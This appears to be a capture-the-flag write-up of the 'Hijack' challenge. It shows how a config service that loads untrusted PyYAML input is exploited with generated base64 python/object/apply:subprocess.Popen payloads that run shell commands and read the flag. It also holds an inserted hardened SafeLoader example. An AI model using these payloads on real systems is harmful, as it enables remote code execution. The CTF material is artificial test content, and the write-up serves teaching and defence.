Hijack
We are given a remote instance to connect to:
$ nc 167.71.143.44 31614
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
>
Basic reconnaissance
We have two options. With the first one, we can set some configuration values, and the output is a Base64-encoded string:
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 1
- Creating new config -
Temperature units (F/C/K): C
Propulsion Components Target Temperature : 13
Solar Array Target Temperature : 37
Infrared Spectrometers Target Temperature : 0
Auto Calibration (ON/OFF) : ON
Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo=
Uploading to ship...
If we decode this string, we will see that it is a serialized object:
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',
propulsion_temp: '13', solar_array_temp: '37', units: C}
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d | xxd
00000000: 2121 7079 7468 6f6e 2f6f 626a 6563 743a !!python/object:
00000010: 5f5f 6d61 696e 5f5f 2e43 6f6e 6669 6720 __main__.Config
00000020: 7b49 525f 7370 6563 7472 6f6d 6574 6572 {IR_spectrometer
00000030: 5f74 656d 703a 2027 3027 2c20 6175 746f _temp: '0', auto
00000040: 5f63 616c 6962 7261 7469 6f6e 3a20 274f _calibration: 'O
00000050: 4e27 2c0a 2020 7072 6f70 756c 7369 6f6e N',. propulsion
00000060: 5f74 656d 703a 2027 3133 272c 2073 6f6c _temp: '13', sol
00000070: 6172 5f61 7272 6179 5f74 656d 703a 2027 ar_array_temp: '
00000080: 3337 272c 2075 6e69 7473 3a20 437d 0a 37', units: C}.
Moreover, a quick search for the !!python/object tag shows that the serialization format is YAML.
Deserialization attack
PyYAML is known to be insecure when it deserializes untrusted data, which might be exactly what option 2 does.
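As an added defensive example (not code from the challenge or from this writeup), this is how option [2] should load the pasted string: a yaml.SafeLoader subclass that knows only the Config tag the service emits and allowlists its attributes, so the python/object/apply tag family the generated payload relies on is refused before anything is constructed. The Config dataclass, the loader names and the sample documents are assumptions constructed for this example.

```python
import base64
from dataclasses import dataclass, fields
import yaml

@dataclass
class Config:  # assumed shape of the service's class, taken from the decoded config above
    IR_spectrometer_temp: str
    auto_calibration: str
    propulsion_temp: str
    solar_array_temp: str
    units: str

# Tag PyYAML's dumper emitted for the service's Config (visible in the decoded string above).
CONFIG_TAG = "tag:yaml.org,2002:python/object:__main__.Config"
ALLOWED_KEYS = {f.name for f in fields(Config)}

class ConfigLoader(yaml.SafeLoader):
    """SafeLoader plus exactly one extra tag; python/object/apply and friends stay undefined."""

def construct_config(loader: yaml.SafeLoader, node: yaml.Node) -> Config:
    mapping = loader.construct_mapping(node, deep=True)  # ConstructorError if not a mapping
    if set(mapping) != ALLOWED_KEYS:  # allowlist: no extra or missing attributes
        raise yaml.constructor.ConstructorError(
            None, None, f"unexpected config keys {sorted(set(mapping) ^ ALLOWED_KEYS)}", node.start_mark)
    return Config(**{k: str(v) for k, v in mapping.items()})

ConfigLoader.add_constructor(CONFIG_TAG, construct_config)

def load_config(serialized_b64: str) -> Config:
    """Hardened stand-in for what option [2] should do with the pasted string."""
    document = base64.b64decode(serialized_b64, validate=True)  # binascii.Error is a ValueError
    obj = yaml.load(document, Loader=ConfigLoader)
    if not isinstance(obj, Config):  # an untagged mapping or scalar is not a config either
        raise ValueError(f"expected Config, got {type(obj).__name__}")
    return obj

def describe(serialized_b64: str) -> str:  # 'accepted: Config(...)' or 'rejected: <ExceptionClass>'
    try:
        return f"accepted: {load_config(serialized_b64)}"
    except (yaml.YAMLError, ValueError) as exc:
        return f"rejected: {type(exc).__name__}"

# Constructed samples: the legitimate config decoded above, a Config tag smuggling an extra attribute, and the python/object/apply tag family.
SAMPLES = {
    "legit": "!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',\n  propulsion_temp: '13', solar_array_temp: '37', units: C}\n",
    "extra_key": "!!python/object:__main__.Config {units: C, extra: 1}\n",
    "apply_tag": "!!python/object/apply:os.getcwd []\n",
}
SAMPLES_B64 = {name: base64.b64encode(doc.encode()).decode() for name, doc in SAMPLES.items()}
```

Running describe() over SAMPLES_B64 accepts only the legitimate document; the other two fail with ConstructorError before any Python object is instantiated.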
There is a public project called python-deserialization-attack-payload-generator that generates payloads for insecure deserialization vulnerabilities in Python (more information in HackTricks):
$ cd python-deserialization-attack-payload-generator
$ python3 peas.py
Enter RCE command :ls -la
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :./payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=
Let’s try it:
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=
** Success **
Uploading to ship...
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> total 20
drwxr-sr-x 1 ctf ctf 4096 Mar 10 20:10 .
drwxr-xr-x 1 root root 4096 Mar 10 20:10 ..
-rw-rw-r-- 1 root root 1583 Mar 10 20:08 chall.py
-rw-rw-r-- 1 root root 49 Mar 10 20:08 flag.txt
-rwxrwxr-x 1 root root 1583 Mar 10 20:08 hijack.py
Nice!
Flag
Let’s now read the flag:
$ python3 peas.py
Enter RCE command :cat flag.txt
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=
** Success **
Uploading to ship...
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}